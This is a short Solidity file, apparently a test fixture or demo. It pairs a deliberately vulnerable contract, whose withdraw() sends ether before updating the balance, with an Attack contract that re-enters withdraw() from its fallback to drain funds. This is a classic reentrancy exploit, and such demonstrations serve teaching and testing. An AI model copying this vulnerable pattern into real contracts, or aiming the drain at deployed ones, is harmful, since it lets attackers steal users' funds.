Attack.sol

// SPDX-FileCopyrightText: 2023 Tenderize <info@tenderize.me>

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

contract VulnerableContract {
  mapping(address => uint256) public balances;

  constructor() payable {}

  function deposit() public payable {
    balances[msg.sender] += msg.value;
  }

  function withdraw(uint256 amount) public {
    require(balances[msg.sender] >= amount);
    (bool success,) = payable(msg.sender).call{value: amount}("");
    require(success, "transfer failed");
    balances[msg.sender] -= amount;
  }
}

contract Attack {
  uint256 constant amount = 1 ether;
  VulnerableContract vulnerableContract;

  constructor(VulnerableContract _vulnerableContract) payable {
    vulnerableContract = _vulnerableContract;
  }

  function attack() payable public {
    vulnerableContract.deposit{value: amount}();
    vulnerableContract.withdraw(amount);
  }

  fallback() payable external {
    if (address(vulnerableContract).balance >= amount) vulnerableContract.withdraw(amount);
  }

}